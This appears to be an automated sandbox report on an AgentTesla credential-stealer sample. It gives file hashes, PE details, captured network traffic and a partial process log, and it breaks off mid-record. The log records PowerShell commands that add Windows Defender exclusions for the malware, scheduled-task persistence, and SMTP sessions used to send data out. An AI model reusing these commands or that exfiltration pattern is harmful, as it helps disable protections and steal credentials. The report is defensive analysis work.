                                                          Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.652735134468148
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:oBMlky3Rkm7h5QK.exe
                                                          File size:761'856 bytes
                                                          MD5:596365c750c4f8e60a966e220e35e7d9
                                                          SHA1:234b7114f19589e1768670361e2a4cd7328f8c75
                                                          SHA256:e77c8ca31128a1a181b99a8234f39559854855d871d7abe167e004bb970e7f3c
                                                          SHA512:5679cc3bca181e417de60f4f8c473a17445405eb32f0e37855111ba5f6b8a95cc22225628da8c0227078177342ad3f9a1b9c3b985e04aff086d0a7e626e20047
                                                          SSDEEP:12288:akz4ayww0uLdzCeXEdFGpQCDsmIag2Sh7unpPcmg5I0i4DVlupWXAhT:UajazCe0dFoQQs55h7uVoG0dDVlup+
                                                          TLSH:8EF41271239CAB25C4A907F50612E17257B59CC750B0D2D94DCA7CCB36B6FC08A26FAB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0.............z.... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4bb47a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0xE6CCA141 [Sat Sep 13 18:51:45 2092 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          inc ecx
                                                          add cl, al
                                                          add bl, al
                                                          add dl, al
                                                          add al, al
                                                          add ah, al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edi+00h], cl
                                                          rol dword ptr [eax], cl
                                                          aad 00h
                                                          aam 00h
                                                          rol byte ptr [eax], cl
                                                          salc
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx+00h], cl
                                                          int 00h
                                                          into
                                                          add ah, cl
                                                          add bh, cl
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ebp+00h], dl
                                                          fiadd dword ptr [eax]
                                                          fild dword ptr [eax]
                                                          fld dword ptr [eax]
                                                          fadd qword ptr [eax]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          inc ebp
                                                          add cl, cl
                                                          add dl, cl
                                                          add al, cl
                                                          add bl, cl
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbb4250x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x5ac.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb9c980x70.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xb94d00xb96005e86cb68c9977a6c1d0505e88c70371cFalse0.8773956401719487data7.660905612133851IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xbc0000x5ac0x6007f9fe5fc1b071b5f24f0852731a074d5False0.4225260416666667data4.102677130099809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xbe0000xc0x200fefe2a1bebcb71ea80e421f2f0eacea1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0xbc0900x31cdata0.4371859296482412
                                                          RT_MANIFEST0xbc3bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 29, 2024 15:02:01.279012918 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.279057026 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.279161930 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.363163948 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.363190889 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.569943905 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.570009947 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.574845076 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.574856997 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.575114965 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.621105909 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.715742111 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.756248951 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.899547100 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.899596930 CET44349702104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:01.899655104 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:01.930885077 CET49702443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:03.753223896 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:04.058649063 CET5874970523.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:04.058751106 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:04.888025999 CET5874970523.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:04.888442993 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:05.187894106 CET5874970523.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:05.212963104 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:05.512031078 CET5874970523.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:05.512866020 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:05.855650902 CET5874970523.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:06.057010889 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.057044983 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.057244062 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.066586971 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.066595078 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.258487940 CET49705587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:06.264997005 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.265074015 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.266886950 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.266896009 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.267270088 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.308609962 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.326014996 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.372234106 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.590116024 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.590204000 CET44349706104.26.12.205192.168.2.6
                                                          Mar 29, 2024 15:02:06.590655088 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:06.599574089 CET49706443192.168.2.6104.26.12.205
                                                          Mar 29, 2024 15:02:07.143821001 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:07.448029041 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:07.448611975 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:07.766577005 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:07.767141104 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:08.066445112 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:08.066719055 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:08.404114962 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:12.367249012 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:12.367700100 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:12.673469067 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:14.515467882 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:14.558648109 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:14.604996920 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:14.910310030 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:14.911286116 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:14.913467884 CET5874970723.226.124.127192.168.2.6
                                                          Mar 29, 2024 15:02:14.913527966 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:15.317481041 CET49707587192.168.2.623.226.124.127
                                                          Mar 29, 2024 15:02:15.627793074 CET5874970723.226.124.127192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Mar 29, 2024 15:02:01.153454065 CET5551353192.168.2.61.1.1.1
                                                          Mar 29, 2024 15:02:01.249396086 CET53555131.1.1.1192.168.2.6
                                                          Mar 29, 2024 15:02:02.835480928 CET5426453192.168.2.61.1.1.1
                                                          Mar 29, 2024 15:02:03.740170002 CET53542641.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Mar 29, 2024 15:02:01.153454065 CET192.168.2.61.1.1.10xd01eStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                          Mar 29, 2024 15:02:02.835480928 CET192.168.2.61.1.1.10x1522Standard query (0)mail.pacificindia.comA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Mar 29, 2024 15:02:01.249396086 CET1.1.1.1192.168.2.60xd01eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                          Mar 29, 2024 15:02:01.249396086 CET1.1.1.1192.168.2.60xd01eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                          Mar 29, 2024 15:02:01.249396086 CET1.1.1.1192.168.2.60xd01eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                          Mar 29, 2024 15:02:03.740170002 CET1.1.1.1192.168.2.60x1522No error (0)mail.pacificindia.com23.226.124.127A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • api.ipify.org

                                                          HTTPS Proxied Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.649702104.26.12.2054431936C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-03-29 14:02:01 UTC155OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive
                                                          2024-03-29 14:02:01 UTC211INHTTP/1.1 200 OK
                                                          Date: Fri, 29 Mar 2024 14:02:01 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 13
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 86c065310d471fec-IAD
                                                          2024-03-29 14:02:01 UTC13INData Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 34 33
                                                          Data Ascii: 102.165.48.43


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649706104.26.12.2054433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-03-29 14:02:06 UTC155OUTGET / HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                          Host: api.ipify.org
                                                          Connection: Keep-Alive
                                                          2024-03-29 14:02:06 UTC211INHTTP/1.1 200 OK
                                                          Date: Fri, 29 Mar 2024 14:02:06 GMT
                                                          Content-Type: text/plain
                                                          Content-Length: 13
                                                          Connection: close
                                                          Vary: Origin
                                                          CF-Cache-Status: DYNAMIC
                                                          Server: cloudflare
                                                          CF-RAY: 86c0654e4dca5a28-IAD
                                                          2024-03-29 14:02:06 UTC13INData Raw: 31 30 32 2e 31 36 35 2e 34 38 2e 34 33
                                                          Data Ascii: 102.165.48.43


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Mar 29, 2024 15:02:04.888025999 CET5874970523.226.124.127192.168.2.6220-server.spearhosting.co.in ESMTP Exim 4.96.2 #2 Fri, 29 Mar 2024 19:32:04 +0530
                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                          220 and/or bulk e-mail.
                                                          Mar 29, 2024 15:02:04.888442993 CET49705587192.168.2.623.226.124.127EHLO 066656
                                                          Mar 29, 2024 15:02:05.187894106 CET5874970523.226.124.127192.168.2.6250-server.spearhosting.co.in Hello 066656 [102.165.48.43]
                                                          250-SIZE 52428800
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-PIPECONNECT
                                                          250-AUTH PLAIN LOGIN
                                                          250-STARTTLS
                                                          250 HELP
                                                          Mar 29, 2024 15:02:05.212963104 CET49705587192.168.2.623.226.124.127AUTH login aHJAcGFjaWZpY2luZGlhLmNvbQ==
                                                          Mar 29, 2024 15:02:05.512031078 CET5874970523.226.124.127192.168.2.6334 UGFzc3dvcmQ6
                                                          Mar 29, 2024 15:02:07.766577005 CET5874970723.226.124.127192.168.2.6220-server.spearhosting.co.in ESMTP Exim 4.96.2 #2 Fri, 29 Mar 2024 19:32:07 +0530
                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                          220 and/or bulk e-mail.
                                                          Mar 29, 2024 15:02:07.767141104 CET49707587192.168.2.623.226.124.127EHLO 066656
                                                          Mar 29, 2024 15:02:08.066445112 CET5874970723.226.124.127192.168.2.6250-server.spearhosting.co.in Hello 066656 [102.165.48.43]
                                                          250-SIZE 52428800
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-PIPECONNECT
                                                          250-AUTH PLAIN LOGIN
                                                          250-STARTTLS
                                                          250 HELP
                                                          Mar 29, 2024 15:02:08.066719055 CET49707587192.168.2.623.226.124.127AUTH login aHJAcGFjaWZpY2luZGlhLmNvbQ==
                                                          Mar 29, 2024 15:02:12.367249012 CET5874970723.226.124.127192.168.2.6334 UGFzc3dvcmQ6
                                                          Mar 29, 2024 15:02:14.515467882 CET5874970723.226.124.127192.168.2.6535 Incorrect authentication data
                                                          Mar 29, 2024 15:02:14.604996920 CET49707587192.168.2.623.226.124.127MAIL FROM:<hr@pacificindia.com>
                                                          Mar 29, 2024 15:02:14.911286116 CET5874970723.226.124.127192.168.2.6550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:15:01:57
                                                          Start date:29/03/2024
                                                          Path:C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"
                                                          Imagebase:0x810000
                                                          File size:761'856 bytes
                                                          MD5 hash:596365C750C4F8E60A966E220E35E7D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2104684722.0000000004A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2104684722.000000000410C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oBMlky3Rkm7h5QK.exe"
                                                          Imagebase:0xa40000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe"
                                                          Imagebase:0xa40000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpE1D3.tmp"
                                                          Imagebase:0x490000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:15:01:59
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0x10000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2133378984.0000000002571000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2133378984.000000000259C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2131866829.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:15:02:00
                                                          Start date:29/03/2024
                                                          Path:C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\ECXXCuFHUVw.exe
                                                          Imagebase:0xe10000
                                                          File size:761'856 bytes
                                                          MD5 hash:596365C750C4F8E60A966E220E35E7D9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2155259832.00000000046ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 68%, ReversingLabs
                                                          • Detection: 69%, Virustotal, Browse
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:15:02:01
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:15:02:04
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECXXCuFHUVw" /XML "C:\Users\user\AppData\Local\Temp\tmpF51D.tmp"
                                                          Imagebase:0x490000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:15:02:04
                                                          Start date:29/03/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:15:02:04
                                                          Start date:29/03/2024
